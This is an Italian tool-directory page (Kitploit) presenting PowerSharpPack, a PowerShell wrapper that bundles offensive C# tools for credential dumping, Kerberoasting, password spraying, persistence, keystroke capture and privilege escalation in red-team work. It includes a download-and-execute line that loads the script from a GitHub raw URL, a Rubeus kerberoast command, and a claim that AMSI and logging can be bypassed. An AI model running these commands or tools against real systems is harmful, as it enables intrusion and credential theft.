Skip to content
KitploitKITPLOIT
StrumentiBlog
Log in
Invia
StrumentiBlog
Invia

Strumenti di Hacking, PenTest e Cybersecurity per il tuo Arsenale di Sicurezza!

Kitploit è una directory di strumenti di hacking, cybersecurity e pentesting. Scopri gli ultimi aggiornamenti dei progetti per trovare vulnerabilità, analizzare sistemi, automatizzare i test e rafforzare la tua sicurezza.

··Feed·Contatto·Privacy·© 2026 Kitploit

Directory degli strumenti

Categorie

Vedi tutte le categorie
Loading categories
PowerSharpPack — Wrapper PowerShell che raggruppa oltre 50 strumenti di sicurezza offensivi in C# per post-sfruttamento, elevazione dei privilegi, dumping delle credenziali, movimento laterale e ricognizione di Active Directory in operazioni di red team. | Kitploit
Strumenti/GitHubGitHub/s3cur3th1ssh1t/powersharppack
Escalation di PrivilegiFramework di ExploitGenerazione di PayloadMovimento LateraleRaccolta InformazioniPost-ExploitPenetration TestingRed Teaming

Più Popolari

Vedi tutti →

Scopri gli strumenti più utilizzati dalla nostra community.

Esplora tutti gli strumenti

Sfoglia la nostra collezione di strumenti

Vedi tutti gli strumenti →
Condividi
GitHub
s3cur3th1ssh1t/powersharppack

PowerSharpPack

Wrapper PowerShell che raggruppa oltre 50 strumenti di sicurezza offensivi in C# per post-sfruttamento, elevazione dei privilegi, dumping delle credenziali, movimento laterale e ricognizione di Active Directory in operazioni di red team.

Vedi Repository
1.7k312241 anno faRevisionato da Kitploit

Sponsorizzato da

     

PowerSharpPack

Molti progetti C# offensivi utili sono stati racchiusi in PowerShell per un facile utilizzo.

Perché? A mio parere personale, PowerShell offensivo non è morto a causa di AMSI, Script-block-logging, Constrained Language Mode o altre funzionalità di protezione. Ognuno di questi meccanismi può essere bypassato. Poiché la maggior parte dei nuovi progetti innovativi di sicurezza offensiva sono scritti in C#, ho deciso di renderli utilizzabili anche in PowerShell.

Quindi cosa ho fatto sostanzialmente?

  1. Prima di tutto, clonare ogni repository C#.
  2. Impostare la classe e i metodi main come pubblici.
  3. Per alcuni progetti ho unito pull request con nuove funzionalità o correzioni di bug, oppure ho dovuto rimuovere istruzioni environment.exit in modo che l'intero processo PowerShell non venga terminato per parametri mancanti e così via.
  4. Successivamente compilare ogni binario.
  5. Comprimere con Gzip e codificare in base64 il binario compilato, e caricarlo in PowerShell tramite [System.Reflection.Assembly]::Load($DecompressedDecodedBinary).

È un processo molto semplice ma che richiede tempo per molti repository.

Quali strumenti sono inclusi?

Internalmonologue

Attacco Internal Monologue: Recupero di hash NTLM senza toccare LSASS

@Crediti a: https://github.com/eladshamir/Internal-Monologue

Seatbelt

Seatbelt è un progetto C# che esegue una serie di "controlli di sicurezza" orientati all'host, rilevanti sia dal punto di vista offensivo che difensivo.

@Crediti a: https://github.com/GhostPack/Seatbelt

SharpWeb

Progetto CLR .NET 2.0 per recuperare le credenziali salvate del browser da Google Chrome, Mozilla Firefox e Microsoft Internet Explorer/Edge.

@Crediti a: https://github.com/djhohnstein/SharpWeb

UrbanBishop

Crea una sezione RW locale in UrbanBishop e poi mappa quella sezione come RX in un processo remoto. Caricamento di shellcode reso facile.

@Crediti a: https://github.com/FuzzySecurity/Sharp-Suite

SharpUp

SharpUp è un porting C# di varie funzionalità di PowerUp.

@Crediti a: https://github.com/GhostPack/SharpUp

Rubeus

Rubeus è un set di strumenti C# per l'interazione grezza con Kerberos e i suoi abusi.

@Crediti a: https://github.com/GhostPack/Rubeus && https://github.com/gentilkiwi/kekeo/

SharPersist

Toolkit di persistenza per Windows scritto in C#.

@Crediti a: https://github.com/fireeye/SharPersist

Sharpview

Implementazione C# di harmj0y's PowerView

@Crediti a: https://github.com/tevora-threat/SharpView

winPEAS

Controlla la checklist di escalation dei privilegi locali di Windows da book.hacktricks.xyz

@Crediti a: https://github.com/carlospolop/privilege-escalation-awesome-scripts-suite/tree/master/winPEAS

Lockless

Lockless permette la copia di file bloccati.

@Crediti a: https://github.com/GhostPack/Lockless

SharpChromium

Progetto CLR .NET 4.0 per recuperare dati di Chromium, come cookie, cronologia e login salvati.

@Crediti a: https://github.com/djhohnstein/SharpChromium

SharpDPAPI

SharpDPAPI è un porting C# di alcune funzionalità DPAPI di Mimikatz.

@Crediti a: https://github.com/GhostPack/SharpDPAPI && https://github.com/gentilkiwi/mimikatz/

SharpShares

Enumera tutte le condivisioni di rete nel dominio corrente. Può anche risolvere i nomi in indirizzi IP.

@Crediti a: https://github.com/djhohnstein/SharpShares

SharpSniper

Trova utenti specifici in Active Directory tramite il loro nome utente e indirizzo IP di accesso

@Crediti a: https://github.com/HunnicCyber/SharpSniper

SharpSpray

SharpSpray è un semplice set di codice per eseguire un attacco di password spraying contro tutti gli utenti di un dominio utilizzando LDAP ed è compatibile con Cobalt Strike.

@Crediti a: https://github.com/jnqpblc/SharpSpray

Watson

Enumera i KB mancanti e suggerisce exploit per vulnerabilità di escalation dei privilegi utili

@Crediti a: https://github.com/rasta-mouse/Watson

Grouper2

Trova vulnerabilità nei Criteri di gruppo di Active Directory

@Crediti a: https://github.com/l0ss/Grouper2

Tokenvator

Uno strumento per elevare i privilegi con i token di Windows

@Crediti a: https://github.com/0xbadjuju/Tokenvator

SauronEye

Strumento di ricerca per trovare file specifici contenenti parole specifiche, ad esempio file contenenti password.

@Crediti a: https://github.com/vivami/SauronEye

Basta caricare lo script principale con

iex(new-object net.webclient).downloadstring('https://raw.githubusercontent.com/S3cur3Th1sSh1t/PowerSharpPack/master/PowerSharpPack.ps1')

e scegliere lo strumento come parametro switch, ad esempio:

PowerSharpPack -seatbelt -Command "AMSIProviders"

alt text

Se si desidera passare più parametri al binario, è sufficiente usare le virgolette come:

PowerSharpPack -Rubeus -Command "kerberoast /outfile:Roasted.txt"

Se non si desidera caricare tutti i binari per vari motivi, è possibile utilizzare gli script PowerShell per singolo binario situati nella cartella PowerSharpBinaries.

Progetti disponibili anche come script PowerShell autonomo:

SharpCloud

Semplice C# per verificare l'esistenza di file di credenziali relativi ad AWS, Microsoft Azure e Google Compute.

@Crediti a: https://github.com/chrismaddalena/SharpCloud

SharpSSDP

SSDP Service Discovery

@Crediti a: https://github.com/rvrsh3ll/SharpSSDP

DAFT

DAFT: Database Audit Framework & Toolkit

@Crediti a: https://github.com/NetSPI/DAFT

Get-RBCD-Threaded

Strumento per scoprire percorsi di attacco di Constrained Delegation basati su risorse in ambienti Active Directory

@Crediti a: https://github.com/FatRodzianko/Get-RBCD-Threaded

SharpGPO-RemoteAccessPolicies

Uno strumento C# per enumerare le politiche di accesso remoto tramite i criteri di gruppo.

@Crediti a: https://github.com/FSecureLABS/SharpGPO-RemoteAccessPolicies

SharpAllowedToAct

Acquisizione di oggetti computer tramite Constrained Delegation basata su risorse (msDS-AllowedToActOnBehalfOfOtherIdentity)

@Crediti a: https://github.com/pkb1s/SharpAllowedToAct

WireTap

Progetto .NET 4.0 per interagire con hardware video, audio e tastiera.

@Crediti a: https://github.com/djhohnstein/WireTap

SharpClipboard

Monitoraggio degli Appunti in C#

@Crediti a: https://github.com/slyd0g/SharpClipboard

SharpPrinter

Scopri stampanti + verifica vulnerabilità

@Crediti a: https://github.com/rvrsh3ll/SharpPrinter

SharpHide

Strumento per creare chiavi di registro nascoste.

@Crediti a: https://github.com/outflanknl/SharpHide

SpoolSample

Strumento PoC per costringere host Windows ad autenticarsi su altre macchine tramite l'interfaccia RPC MS-RPRN. Ciò è possibile anche tramite altri protocolli.

@Crediti a: https://github.com/leechristensen/SpoolSample

SharpGPOAbuse

SharpGPOAbuse è un'applicazione .NET scritta in C# che può essere utilizzata per sfruttare i diritti di modifica di un utente su un Oggetto Criterio di Gruppo (GPO) al fine di compromettere gli oggetti controllati da quel GPO.

@Crediti a: https://github.com/FSecureLABS/SharpGPOAbuse

SharpDump

SharpDump è un porting C# della funzionalità Out-Minidump.ps1 di PowerSploit.

@Crediti a: https://github.com/GhostPack/SharpDump

SharpHound3

Raccolta dati C# per il progetto BloodHound, Versione 3

@Crediti a: https://github.com/BloodHoundAD/SharpHound3

PostDump

Un altro strumento per eseguire il minidump del processo LSASS utilizzando poche tecniche per evitare il rilevamento.

@Crediti a: https://github.com/YOLOP0wn/POSTDump

SharpLocker

Scarica lo strumento